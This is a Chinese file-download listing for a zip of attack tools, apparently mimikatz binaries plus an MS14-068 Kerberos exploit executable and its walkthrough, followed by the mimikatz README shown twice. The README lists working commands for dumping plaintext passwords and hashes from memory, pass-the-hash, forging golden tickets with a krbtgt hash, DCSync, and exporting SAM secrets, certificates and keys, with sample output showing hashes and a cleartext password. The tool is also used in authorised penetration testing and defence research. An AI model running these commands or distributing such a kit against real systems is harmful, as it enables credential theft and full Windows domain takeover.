mimikatz,ms14068

  • x6_365323
    了解作者
  • 6.9MB
    文件大小
  • zip
    文件格式
  • 0
    收藏次数
  • VIP专享
    资源类型
  • 0
    下载次数
  • 2022-06-02 21:04
    上传日期
mimikatz mimikatz is a tool I've made to learn C and make somes experiments with Windows security. It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets. .#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03) .## ^ ##. ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' with 13 modules * * */ mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::logonpasswords Authentication Id : 0 ; 515764 (00000000:0007deb4) Session : Interactive from 2 User Name : Gentil Kiwi Domain : vm-w7-ult-x SID : S-1-5-21-1982681256-1210654043-1600862990-1000 msv : [00000003] Primary * Username : Gentil Kiwi * Domain : vm-w7-ult-x * LM : d0e9aee149655a6075e4540af1f22d3b * NTLM : cc36cf7a8514893efccd332446158b1a * SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30 tspkg : * Username : Gentil Kiwi * Domain : vm-w7-ult-x * Password : waza1234/ ... But that's not all! Crypto, Terminal Server, Events, ... lots of informations in the GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki or on http://blog.gentilkiwi.com (in French, yes). If you don't want to build it, binaries are availables on https://github.com/gentilkiwi/mimikatz/releases Quick usage log privilege::debug sekurlsa sekurlsa::logonpasswords sekurlsa::tickets /export sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd kerberos kerberos::list /export kerberos::ptt c:\chocolate.kirbi kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi crypto crypto::capi crypto::cng crypto::certificates /export crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::keys /export crypto::keys /machine /export vault & lsadump vault::cred vault::list token::elevate vault::cred vault::list lsadump::sam lsadump::secrets lsadump::cache token::revert lsadump::dcsync /user:domain\krbtgt /domain:lab.local Build mimikatz is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are: - for mimikatz and mimilib : Visual Studio 2010, 2012 or 2013 for Desktop (2013 Express for Desktop is free and supports x86 & x64 - http://www.microsoft.com/download/details.aspx?id=44914) - for mimikatz driver, mimilove (and ddk2003 platform) : Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 mimikatz uses SVN for source control, but is now available with GIT too! You can use any tools you want to sync, even incorporated GIT in Visual Studio 2013 =) Synchronize! - GIT URL is : https://github.com/gentilkiwi/mimikatz.git - SVN URL is : https://github.com/gentilkiwi/mimikatz/trunk - ZIP file is : https://github.com/gentilkiwi/mimikatz/archive/master.zip Build the solution - After opening the solution, Build / Build Solution (you can change architecture) - mimikatz is now built and ready to be used! (Win32 / x64) - you can have error MSB3073 about _build_.cmd and mimidrv, it's because the driver cannot be build without Windows Driver Kit 7.1 (WinDDK), but mimikatz and mimilib are OK. ddk2003 With this optional MSBuild platform, you can use the WinDDK build tools, and the default msvcrt runtime (smaller binaries, no dependencies) For this optional platform, Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 and Visual Studio 2010 are mandatory, even if you plan to use Visual Studio 2012 or 2013 after. Follow instructions: - http://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme - http://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader Licence CC BY 4.0 licence - https://creativecommons.org/licenses/by/4.0/ Author - Benjamin DELPY gentilkiwi, you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com ) - DCSync function in lsadump module was co-writed with Vincent LE TOUX, you contact him by mail ( vincent.letoux [at] gmail.com ) or visit his website ( http://www.mysmartlogon.com ) This is a personal development, please respect its philosophy and don't use it for bad things!
教程跟工具.zip
  • 14068py.exe
    6.1MB
  • mimikatz_trunk
  • Win32
  • mimilove.exe
    23.5KB
  • mimilib.dll
    25KB
  • mimidrv.sys
    29.4KB
  • mimikatz.exe
    314KB
  • kiwi_passwords.yar
    2.8KB
  • x64
  • mimilib.dll
    28.5KB
  • mimidrv.sys
    35.9KB
  • mimikatz.exe
    413KB
  • README.md
    4.7KB
  • ms14-068过程.txt
    3.6KB
  • ms-14-068过程.exe
    4.9MB
内容介绍
# mimikatz **`mimikatz`** is a tool I've made to learn `C` and make somes experiments with Windows security. It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. **`mimikatz`** can also perform pass-the-hash, pass-the-ticket or build _Golden tickets_. ``` .#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03) .## ^ ##. ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' with 13 modules * * */ mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::logonpasswords Authentication Id : 0 ; 515764 (00000000:0007deb4) Session : Interactive from 2 User Name : Gentil Kiwi Domain : vm-w7-ult-x SID : S-1-5-21-1982681256-1210654043-1600862990-1000 msv : [00000003] Primary * Username : Gentil Kiwi * Domain : vm-w7-ult-x * LM : d0e9aee149655a6075e4540af1f22d3b * NTLM : cc36cf7a8514893efccd332446158b1a * SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30 tspkg : * Username : Gentil Kiwi * Domain : vm-w7-ult-x * Password : waza1234/ ... ``` But that's not all! `Crypto`, `Terminal Server`, `Events`, ... lots of informations in the GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki or on http://blog.gentilkiwi.com (in French, _yes_). If you don't want to build it, binaries are availables on https://github.com/gentilkiwi/mimikatz/releases ## Quick usage ``` log privilege::debug ``` ### sekurlsa ``` sekurlsa::logonpasswords sekurlsa::tickets /export sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd ``` ### kerberos ``` kerberos::list /export kerberos::ptt c:\chocolate.kirbi kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi ``` ### crypto ``` crypto::capi crypto::cng crypto::certificates /export crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::keys /export crypto::keys /machine /export ``` ### vault & lsadump ``` vault::cred vault::list token::elevate vault::cred vault::list lsadump::sam lsadump::secrets lsadump::cache token::revert lsadump::dcsync /user:domain\krbtgt /domain:lab.local ``` ## Build `mimikatz` is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are: * for `mimikatz` and `mimilib` : Visual Studio 2010, 2012 or 2013 for Desktop (**2013 Express for Desktop is free and supports x86 & x64** - http://www.microsoft.com/download/details.aspx?id=44914) * _for `mimikatz driver`, `mimilove` (and `ddk2003` platform) : Windows Driver Kit **7.1** (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800_ `mimikatz` uses `SVN` for source control, but is now available with `GIT` too! You can use any tools you want to sync, even incorporated `GIT` in Visual Studio 2013 =) ### Synchronize! * GIT URL is : https://github.com/gentilkiwi/mimikatz.git * SVN URL is : https://github.com/gentilkiwi/mimikatz/trunk * ZIP file is : https://github.com/gentilkiwi/mimikatz/archive/master.zip ### Build the solution * After opening the solution, `Build` / `Build Solution` (you can change architecture) * `mimikatz` is now built and ready to be used! (`Win32` / `x64`) * you can have error `MSB3073` about `_build_.cmd` and `mimidrv`, it's because the driver cannot be build without Windows Driver Kit **7.1** (WinDDK), but `mimikatz` and `mimilib` are OK. ### ddk2003 With this optional MSBuild platform, you can use the WinDDK build tools, and the default `msvcrt` runtime (smaller binaries, no dependencies) For this optional platform, Windows Driver Kit **7.1** (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 and Visual Studio **2010** are mandatory, even if you plan to use Visual Studio 2012 or 2013 after. Follow instructions: * http://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme * _http://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader_ ## Licence CC BY 4.0 licence - https://creativecommons.org/licenses/by/4.0/ ## Author * Benjamin DELPY `gentilkiwi`, you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com ) * DCSync function in `lsadump` module was co-writed with Vincent LE TOUX, you contact him by mail ( vincent.letoux [at] gmail.com ) or visit his website ( http://www.mysmartlogon.com ) This is a **personal** development, please respect its philosophy and don't use it for bad things!
评论
    相关推荐
    • hive_windows可执行文件
      windows下hive可执行文件,下载解压后替换hive安装目录 下的bin目录即可
    • p28412269_112040_WINNT.zip
      此补丁程序所解决的 Bug 10136473 CELLSRV FAILS DUE TO ORA-7445 [KAF4F0RST9IR2SRP1] 11733603 ORA-54 WITH SELECT STATEMENT USING NOWAIT CLAUSE WITH NO CONCURRENT ACTIVE TX 11786053 SR11.2.0.3ASM - TRC ...
    • hive-lite:Hive Lite是免费的优雅杂志WordPress博客主题
      Hive Lite:免费的WordPress博客主题 各种发布者都可以轻松使用的工具,以其干净的砖石风格的布局,现代的版式和灵活性而倍受珍视。 无论您是想分享自己的想法,写您的最新发现,还是只是有照片,视频,报价或其他...
    • 支持中文的hive-0.80
      hive-0.80默认是不支持中文的,这是打过补丁之后的版本,可以支持元数据中的中文,如表注释和字段注释等,经过验证desc table可以正常显示中文注释
    • Registry Hive access library
      Registry Hive access library v0.95 110511, (c) Petter N Hagen
    • DVD Hive-开源
      Windows的DVD创作。 功能包括可通过数字选择的DVD标题菜单,自定义启动屏幕,自定义简短介绍视频,画廊幻灯片放映,每个标题/间隔的章节以及自定义背景。 用Delphi 4编码。
    • P1-Hive:项目一:Hive游戏
      P1-Hive游戏 这是获奖游戏Hive的简化的计算机版本。 游戏的目的是使用以独特方式移动的生物块包围对手的女王蜂。 关于游戏 游戏是两个人一起玩的。 每个玩家有7个六边形的碎片,上面有以下生物:1只蜂王,2只甲虫,2...
    • hive Windows 可执行文件
      windows平台下,hive可执行文件,完全没有问题,可以使用。 将这个bin目录覆盖hive原有的bin目录即可
    • TexPoint 2,7
      这里所提供的2.7版本是收费之前的最后一个版本,因此功能上与最新版本最为接近,bug相对之前免费的也是最少的。 其安装要求与步骤如下: Installation of TeXPoint 2.7 (for MS PowerPoint XP/2003) Note: You ...
    • hive-win-bin.zip
      hive高版本中已经没有提供windows下的运行脚本了,使用Cygwin有些问题,配置经常出现正反斜杠的问题,资源为hive的windows下的运行脚本,下载覆盖bin目录就可以了,也可以根据自己需要选择脚本添加到bin目录中,如果...